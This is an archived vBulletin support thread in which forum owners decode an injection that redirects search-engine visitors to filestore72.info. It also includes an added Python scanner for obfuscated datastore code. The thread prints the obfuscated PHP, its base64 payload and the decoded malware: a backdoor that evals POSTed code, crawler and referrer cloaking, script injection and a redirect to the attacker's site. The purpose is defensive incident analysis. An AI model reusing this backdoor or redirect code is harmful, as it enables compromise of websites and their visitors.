vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB3 General Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=111)
-   -   vB 3.8 virus infection - How to remove filestore72.info (https://vborg.vbsupport.ru/showthread.php?t=319558)

Fynnon 07-19-2015 01:57 PM

vB 3.8 virus infection - How to remove filestore72.info
 
Hi, I got some people complaining that, coming from Google, the forum redirects to filestore72.info.

Using

Code:

SELECT * FROM datastore WHERE data LIKE '%strtr%'

I found something I can't decipher, so maybe someone here could provide some assistance.

PHP Code:

$vbulletin->templatecache['headinclude'] .= fetch_template('activity_headinclude');

// The assignment operators and argument separators below were dropped when the code was pasted;
// they are restored where the original is unambiguous.
$pt = 'b6d38f1684e2389d8aa938bc5fbee5c6';
$arrvb = '30m%D2zm93h[,V3kRV3D>/e=>K%omJ=A+g}]*K%lEC+8zlX6m"=ogKJ[mgX6kB4jk7j<3Bq&E.VjmgX?zC)_gKJBkl=BkBk9T.jf>/eR>K&0+8=%k]>0k]T]#bL<*|8<+Or<k|X%V.4jg8~Nw8qz>/~6g7j<+g+rz.rO;gX%Xvq^+CJvzKq%E/X6k%=Bz|}&TB4jg8~Nw8qz>/~6g7j<En9jVn8Lk/>%+8=Q;gqvm.4]1K>0V/&AkC%j+g>x;|>rVK&xkK&8k]~x3")o+CJ[1Kj]#.q^w6J7JjJ7"BV1J)q}g8JnqJ>^}wV)n%}]g7jf>/T=}/~rk]X%g|JBz.4jg8X)w%+)w%9]7)qww)=7qw+)wjJ7>86<*Bq6NwLjk89]mC=AV.VV*BqBNw~?klJ]gK8rVCXRE.kvzC%K+J?o;K=Q^CV0zKV9+J?o^/%rmC=0g._x;l%o+B_vzK8x3")o+CJ[g._BVg&B;"8OzCJBg._BVg&O;"%jVJ?o^C+r;KJOzK=!g._xm"_AVC)]kl)Qg._xVC%o3gJBz)?o^C><V)?oz/jvm7k9>/}<^/?jVb6=>|}o;Kx]*BqRNwLjg8X)w%+)w%9]7)qww)=1n8Xw>86f>/L=}eXNn6Q>qJ=}wjJC7J4f>Ce=})q17JX^w6X77J~wNn6=>K8<kKT]*BqvN7q?#OV9;gX6Vl%Amg}]*BqoN7q?#OV9;"_]gK%j>A9j3n8Lz|>jEe+>neJ^JjJ7w6%NnOj:kr!D[|Z:Xnef>/R=+"8?V/jR>)=nqJ>"qJ>z>6rwJ)~^")=Xn8R]g7jf>CR=>A&A;|><k/}4V/%?+n6OVCJ[V.=I;g+rkKXBmg~61O~AklT=1Oko>/+OV"&9+gq<zO6:kr!D[|Z:z|~6m"=ok89];l>8kl?]g7[]#K8<kKTokCr?N|;=>B[jVl>8zC&%VC%o#n_0k/q<zK_A"BVAm"8?zCJK+g>Am"=o>86o>B+rzgLfm]T=m]TONv?0kKXBmg~6NOkfm";R+"8?V/jR>)=bn6=#7wJz>C_VE7%fm";R>Cel>l%AkKJ6E.q^q6Jw"BVK>86<>O;RmgXA+g}R>)=/qJqz>K<A>86<E7;lE.)%zg~6374jg6XNn6Q>qJ9j;86<E7%fm";R>/}=N7qREgQ<+O4j3O%A+gqvzK=!m"wR>C[9>KJo>B&6m"8%E.j!TA;?TbL<*BqQNgX8;]X6kOrQ+bwR>C4<#bL9*.jfk/><z]}R1lq0;|JQ+"_6#l&0;K)6m"=oN7VRV/q?*Ox0+l%9+gX6z|>%XA1om"_lzB=jz|VozC=r+._?m/L:kr!D[fZ:m"}=3BqQ^7kOEnQ=+gr<VbQ=m";RE.ejV7jl>OqBEgQ<+O4j37%f>eVTn6>~n)Xz>|q%zg~9;gq%gKr0zK9]gJ9]mCJr+C%o;K&8+CJ^ml)K;gXvkl%?V.VV#v6jmvQ=+"&A+g9jq6&N}j)Tw89]k|q_zCw]gJ9];|XA>86oN7qI*|8=^}ZZ`';
$ajx = ':eMx(UPoYL}O`I5&@|=XQ^sp4~1Tt*./+2>9j"7AmgKv#rZy8!Vwd[kqicnS6NhzD-a$R;ulF3,BG{?JWfCEb%]H0)_<';
$ajx2 = '.E[8/~?u#AQi;q-x|39Ntf&<gBIM,OCHZ@JskWSzaX2jLh)+1rdU`4cR:=T>0P6b($"%oY!m{e_y}]wV*7GKDln^vF5p';
$baseline = '%s%'.substr($arrvb7331);   // substr() argument separators lost in the paste; left as posted
// strtr() maps the $ajx alphabet onto $ajx2, i.e. a substitution cipher over $arrvb; the result
// becomes the preg_replace() replacement string, with the pattern (and its modifiers) held in $baseline.
$gpu = preg_replace($baseline, strtr($arrvb, $ajx, $ajx2), 'vbseo');
if ($vbulletin->options['vbseostats'] && $vbulletin->options['vbseonavLink']) {
    eval('$template_hook[navbar_buttons_left] .= "'.fetch_template('activity_navbar').'";');
}
//endif($vbulletin->options['vbseonavLink'])

$vbulletin->templatecache['forumhome_lastpostby'] = $vbulletin->templatecache['colorsforusergroupinforumdisplay'] . $vbulletin->templatecache['forumhome_lastpostby'];
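As an added example (my code, not from the thread or from vBulletin), here is a small Python scanner that generalises the LIKE '%strtr%' query above: instead of one keyword it checks each datastore row for several constructs the injected code relies on at once (a three-argument strtr() with variable alphabets, preg_replace() with its pattern hidden in a variable, eval/base64_decode/str_rot13, request input indexed by a variable key, and a long high-entropy string literal). The sample rows, the regexes and the entropy threshold are constructed for the example; in practice you would feed it the title/data columns of the real datastore or plugin table.

```python
import math
import re

# Heuristic indicators chosen for this example; the label on the right is what the scanner reports.
INDICATORS = [
    (re.compile(r"\beval\s*\("), "eval()"),
    (re.compile(r"\bbase64_decode\s*\("), "base64_decode()"),
    (re.compile(r"\bstr_rot13\s*\("), "str_rot13()"),
    (re.compile(r"\bstrtr\s*\(\s*\$\w+\s*,\s*\$\w+\s*,\s*\$\w+\s*\)"), "strtr() with variable alphabets"),
    (re.compile(r"\bpreg_replace\s*\(\s*\$\w+"), "preg_replace() with pattern held in a variable"),
    (re.compile(r"\bchr\s*\(\s*\d+\s*\)"), "chr() character building"),
    (re.compile(r"\$_(POST|GET|COOKIE|REQUEST)\s*\[\s*\$\w+\s*\]"), "request input indexed by a variable key"),
]

# Single-quoted PHP string literals of 40 or more characters (backslash escapes allowed).
QUOTED = re.compile(r"'((?:[^'\\]|\\.){40,})'")


def shannon_entropy(s):
    """Bits per character of s; random-looking alphabets score far above serialized config data."""
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def scan_code(code, entropy_threshold=5.0):
    """Return the indicator labels that fire on one PHP/serialized-data string."""
    hits = [label for rx, label in INDICATORS if rx.search(code)]
    for m in QUOTED.finditer(code):
        if shannon_entropy(m.group(1)) >= entropy_threshold:
            hits.append("high-entropy string literal")
            break
    return hits


def scan_rows(rows):
    """rows: iterable of (title, data) pairs like the vB3 datastore table. Returns {title: hits} for rows that fire."""
    flagged = {}
    for title, data in rows:
        hits = scan_code(data)
        if hits:
            flagged[title] = hits
    return flagged


# Constructed sample rows (not real forum data). The first two imitate legitimate datastore
# entries; the third imitates the shape of the injected code quoted in this thread, with a
# made-up printable alphabet in place of the real obfuscation tables.
SAMPLE_ROWS = [
    ("options", 'a:2:{s:5:"bburl";s:20:"http://forum.example";s:13:"simpleversion";s:3:"v38";}'),
    ("forumcache", 'a:1:{i:1;a:2:{s:5:"title";s:7:"General";s:11:"description";s:20:"Talk about anything.";}}'),
    ("pluginlist",
     "$pt = 'PLACEHOLDER_KEY';\n"
     "$arrvb = '" + "".join(chr(c) for c in range(33, 127) if c not in (39, 92)) + "';\n"
     "$ajx = 'abc'; $ajx2 = 'xyz';\n"
     "$baseline = '%s%' . substr($arrvb, 0, 1);\n"
     "$gpu = preg_replace($baseline, strtr($arrvb, $ajx, $ajx2), 'vbseo');\n"),
]

if __name__ == "__main__":
    for title, hits in scan_rows(SAMPLE_ROWS).items():
        print(f"{title}: {', '.join(hits)}")
```

Only the constructed pluginlist row is reported; the two legitimate-looking rows produce no hits, which is the point of combining several weak signals rather than grepping for a single function name.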


Replicant 07-19-2015 05:00 PM

1 Attachment(s)
The strtr function in the $gpu line kicks out:

Code:

eval(@base64_decode(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.chr(43).NTE7JHo9ZW1wdHkoJF9TRVJWRVJbJ0hUVFBfWF9NT1onXSk7JGo9JzxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBzcmM9IicuJHZidWxsZXRpbi0.chr(43).b3B0aW9uc1snYmJ1cmwnXS4nL21pc2MucGhwP3Y9Jy4kdmJ1bGxldGluLT5vcHRpb25zWydzaW1wbGV2ZXJzaW9uJ10uJyZhbXA7anM9anMiPjwvc2NyaXB0Pic7aWYoZW1wdHkoJF9DT09LSUVbJG5dKSl7aWYoJGEmJmlzc2V0KCRfR0VUWyd2J10pJiYoaXNzZXQoJF9HRVRbJ2pzJ10pKSYmKCFlbXB0eSgkX0NPT0tJRVskY10pKSl7aWYoJHQ9PSRoKXtpZigkeilzZXRjb29raWUoJG4sJ2VuJyx0aW1lKCkrMzYwMDApOyRtPXN1YnN0cihtZDUoJGgpLDAsOCk7cHJpbnQoImRvY3VtZW50LmxvY2F0aW9uPSdodHRwOi8vZmlsZXN0b3JlNzIuaW5mby9kb3dubG9hZC5waHA.chr(47).aWQ9eyRtfSciKTt9ZXhpdDt9aWYoKCEkdSkmJiRyKXtpZigkeSl7JEdMT0JBTFNbJ3RlbXBsYXRlX2hvb2snXVsnaGVhZGluY2x1ZGVfamF2YXNjcmlwdCddLj0kajt9ZWxzZXskR0xPQkFMU1snc3R5bGUnXVsnY3NzJ10uPSRqO319fQ));
The editor won't let me post the decoded result, so I'll put it in picture form.

Fynnon 07-19-2015 06:08 PM

Thanks. From your code, using this online tool https://www.samltool.com/base64.php, I got:

PHP Code:

// Characters the forum editor mangled in the decode have been restored from the base64 above
// ('base 64_decode' -> base64_decode, '-7options' -> ->options, ')751' -> )>51, 'php;id' -> php?id).
$q='ini_set';if(function_exists($q)){$q('display_errors',0);$q('log_errors',0);}   // hide PHP errors
if(isset($_POST[$pt]))eval(base64_decode(str_rot13($_POST[$pt])));                 // backdoor: runs whatever is POSTed under the key in $pt
$u=@preg_match('#bot|spider|crawl|slurp|yandex#i',$_SERVER['HTTP_USER_AGENT']);    // $u: request looks like a crawler
$s=@parse_url($_SERVER['HTTP_REFERER']);$t=@$s['host'];
$r=@preg_match('#live\.com|google\.|yahoo\.|bing.com|yandex\.ru|rambler\.ru|baidu\.|facebook\.|instagram\.|tinyurl\.|bit\.ly#i',$t)||$t=='t.co';   // $r: visitor arrived from a search engine or social site
$h=@$_SERVER['HTTP_HOST'];$p=@COOKIE_PREFIX;$a=@THIS_SCRIPT==='misc';$c=$p.'lastvisit';$n=$p.'lang_id';
$y=@ord(FILE_VERSION)>51;   // true on vBulletin 4.x and later, false on 3.x
$z=empty($_SERVER['HTTP_X_MOZ']);
$j='<script type="text/javascript" src="'.$vbulletin->options['bburl'].'/misc.php?v='.$vbulletin->options['simpleversion'].'&amp;js=js"></script>';
if(empty($_COOKIE[$n])){   // only visitors who have not yet received the lang_id cookie
  if($a&&isset($_GET['v'])&&(isset($_GET['js']))&&(!empty($_COOKIE[$c]))){   // the injected misc.php?v=..&js=js request
    if($t==$h){
      if($z)setcookie($n,'en',time()+36000);
      $m=substr(md5($h),0,8);print("document.location='http://filestore72.info/download.php?id={$m}'");   // the redirect
    }
    exit;
  }
  if((!$u)&&$r){   // real browser coming from a search engine: inject the script tag into the page
    if($y){$GLOBALS['template_hook']['headinclude_javascript'].=$j;}else{$GLOBALS['style']['css'].=$j;}
  }
}


EDIT: still getting redirects


Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.
